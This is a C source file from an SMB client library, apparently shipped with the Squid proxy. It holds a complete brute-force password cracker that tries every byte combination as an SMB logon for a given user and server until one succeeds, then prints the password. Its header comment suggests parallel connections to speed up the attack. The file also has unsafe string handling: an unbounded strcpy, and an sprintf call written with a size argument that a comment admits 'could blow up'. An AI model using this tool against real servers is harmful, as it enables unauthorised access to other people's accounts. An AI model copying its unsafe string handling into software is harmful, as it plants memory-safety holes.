lib/smblib/find_password.c

   1 #include "squid.h"
   2 /* Find passwords ... */
   3 /* We do it in a brute force way ... Cycle through all the possible passwords
   4    sending a logon to see if all it works ... We have to wait for any timeout
   5    the the server implements before we try the next one. We could open lots
   6    of connections to the server and then send the logon request and not wait
   7    for the reply. This would allow us to have lots of outstanding attempts at
   8    a time. */
   9
  10 #include <sys/types.h>
  11 #include <unistd.h>
  12 #if HAVE_STRING_H
  13 #include <string.h>
  14 #endif
  15
  16 #include "smblib/smblib.h"
  17
  18 int verbose = FALSE;
  19 int lotc = FALSE;
  20
  21 char *SMB_Prots[] = {"PC NETWORK PROGRAM 1.0",
  22                      "MICROSOFT NETWORKS 1.03",
  23                      "MICROSOFT NETWORKS 3.0",
  24                      "LANMAN1.0",
  25                      "LM1.2X002",
  26                      "LANMAN2.1",
  27                      "NT LM 0.12",
  28                      "NT LANMAN 1.0",
  29                      NULL
  30                     };
  31
  32 void usage()
  33
  34 {
  35     fprintf(stderr,"Usage: find_password -u <user> -l <pwd-len-max> server\n");
  36 }
  37
  38 /* figure out next password */
  39
  40 static int pwinit = FALSE, pwpos = 0;
  41
  42 int next_password(char *pw, int pwlen)
  43
  44 {
  45     int i, carry = FALSE;
  46
  47     if (pwinit == FALSE) {
  48
  49         pwinit = TRUE;
  50         memset(pw, 0, pwlen + 1);
  51         pwpos = 0;
  52
  53     }
  54
  55     i = pwpos;
  56
  57     while (TRUE) {
  58
  59         pw[i] = pw[i] + 1;
  60
  61         /* If it has wrapped around, then inc to 1 and carry up the chain */
  62
  63         if (pw[i] == 0) {
  64
  65             pw[i] = 1;
  66             i = i - 1;
  67
  68             if (i < 0) {  /* If we went off the end, increment pwpos */
  69
  70                 pwpos = pwpos + 1;
  71                 if (pwpos >= pwlen) return(FALSE); /* No more passwords */
  72
  73                 pw[pwpos] = 1;
  74                 return(TRUE);
  75
  76             }
  77
  78         } else
  79             return(TRUE);
  80
  81         return(FALSE);
  82     }
  83 }
  84
  85 static char pwd_str[1024];  /* Where we put passwords as we convert them */
  86
  87 char *print_password(char * password)
  88
  89 {
  90     int i,j;
  91     char temp[4];
  92
  93     j = 0;
  94
  95     for (i = 0; i < strlen(password); i++) {
  96
  97         if (((unsigned)password[i] <= ' ') || ((unsigned)password[i] > 127)) {
  98
  99             pwd_str[j] = '\\';
 100             snprintf(temp, sizeof(temp)-1, "%03i", (int)password[i]);
 101             strcpy(&pwd_str[j + 1], temp);
 102             j = j + 3;                       /* Space for \ accounted for below */
 103
 104         } else
 105             pwd_str[j] = password[i];
 106
 107         j = j + 1;
 108
 109     }
 110
 111     pwd_str[j] = 0;  /* Put a null on the end ... */
 112
 113     return(pwd_str);
 114
 115 }
 116
 117 main(int argc, char *argv[])
 118
 119 {
 120     void *con, *tree;
 121     extern char *optarg;
 122     extern int optind;
 123     int opt, error, SMB_Error, err_class, err_code, pwlen, tries = 0;
 124     char server[80], service[80], service_name[160], password[80], username[80];
 125     char old_password[80], err_string[1024];
 126
 127     server[0] = 0;
 128     strncpy(service, "IPC$", sizeof(service) - 1);
 129     service_name[0] = 0;
 130     username[0] = 0;
 131     password[0] = 0;
 132     old_password[0] = 0;
 133
 134     while ((opt = getopt(argc, argv, "s:u:l:v")) != EOF) {
 135
 136         switch (opt) {
 137         case 's':
 138
 139             strcpy(service, optarg);
 140             break;
 141
 142         case 'u':     /* Pick up the user name */
 143
 144             strncpy(username, optarg, sizeof(username) - 1);
 145             break;
 146
 147         case 'l':     /* pick up password len */
 148
 149             pwlen = atoi(optarg);
 150             break;
 151
 152         case 'v':     /* Verbose? */
 153             verbose = TRUE;
 154             break;
 155
 156         default:
 157
 158             usage();
 159             exit(1);
 160             break;
 161         }
 162
 163     }
 164
 165     if (optind < argc) { /* Some more parameters, assume is the server */
 166         strncpy(server, argv[optind], sizeof(server) - 1);
 167         optind++;
 168     } else {
 169         strcpy(server, "nemesis");
 170     }
 171
 172     if (verbose == TRUE) {  /* Print out all we know */
 173
 174         fprintf(stderr, "Finding password for User: %s, on server: %s\n",
 175                 username, server);
 176         fprintf(stderr, "with a pwlen = %i\n", pwlen);
 177
 178     }
 179
 180     SMB_Init();          /* Initialize things ... */
 181
 182     /* We connect to the server and negotiate */
 183
 184     con = SMB_Connect_Server(NULL, server);
 185
 186     if (con == NULL) {  /* Error processing */
 187
 188         fprintf(stderr, "Unable to connect to server %s ...\n", server);
 189
 190         if (SMB_Get_Last_Error() == SMBlibE_Remote) {
 191
 192             SMB_Error = SMB_Get_Last_SMB_Err();
 193             SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error),
 194                                   SMBlib_Error_Code(SMB_Error),
 195                                   err_string,
 196                                   sizeof(err_string) - 1);
 197
 198         } else {
 199             SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1);
 200         }
 201
 202         printf("  %s\n", err_string);
 203         exit(1);
 204
 205     }
 206
 207     /* We need to negotiate a protocol better than PC NetWork Program */
 208
 209     if (SMB_Negotiate(con, SMB_Prots) < 0) {
 210
 211         fprintf(stderr, "Unable to negotiate a protocol with server %s ...\n",
 212                 server);
 213
 214         if (SMB_Get_Last_Error() == SMBlibE_Remote) {
 215
 216             SMB_Error = SMB_Get_Last_SMB_Err();
 217             SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error),
 218                                   SMBlib_Error_Code(SMB_Error),
 219                                   err_string,
 220                                   sizeof(err_string) - 1);
 221
 222         } else {
 223             SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1);
 224         }
 225
 226         printf("  %s\n", err_string);
 227         exit(1);
 228
 229     }
 230
 231     sprintf(service_name, sizeof(service_name)-1, "\\\\%s\\%s", server, service); /* Could blow up */
 232
 233     /* Now loop through all password possibilities ... */
 234
 235     memset(password, 0, sizeof(password));
 236
 237     while (next_password(password, pwlen) == TRUE) {
 238
 239         if ((tree = SMB_Logon_And_TCon(con,
 240                                        NULL,
 241                                        username,
 242                                        password,
 243                                        service_name, "?????")) == NULL) {
 244
 245             if (verbose == TRUE) { /* Lets hear about the error */
 246
 247                 fprintf(stderr, "Unable to logon and tree connect to server %s ...\n",
 248                         server);
 249                 fprintf(stderr, "With username: %s, and password: %s\n",
 250                         username, print_password(password));
 251
 252                 if (SMB_Get_Last_Error() == SMBlibE_Remote) {
 253
 254                     SMB_Error = SMB_Get_Last_SMB_Err();
 255                     SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error),
 256                                           SMBlib_Error_Code(SMB_Error),
 257                                           err_string,
 258                                           sizeof(err_string) - 1);
 259
 260                 } else {
 261                     SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1);
 262                 }
 263
 264                 printf("  %s\n", err_string);
 265
 266             }
 267         } else { /* Password match */
 268
 269             fprintf(stderr, "Logged in with password:%s\n",
 270                     print_password(password));
 271
 272             /* Exit now ... */
 273
 274             exit(0);
 275
 276         }
 277
 278     }
 279
 280     fprintf(stderr, "Passwords exhausted.");
 281
 282 }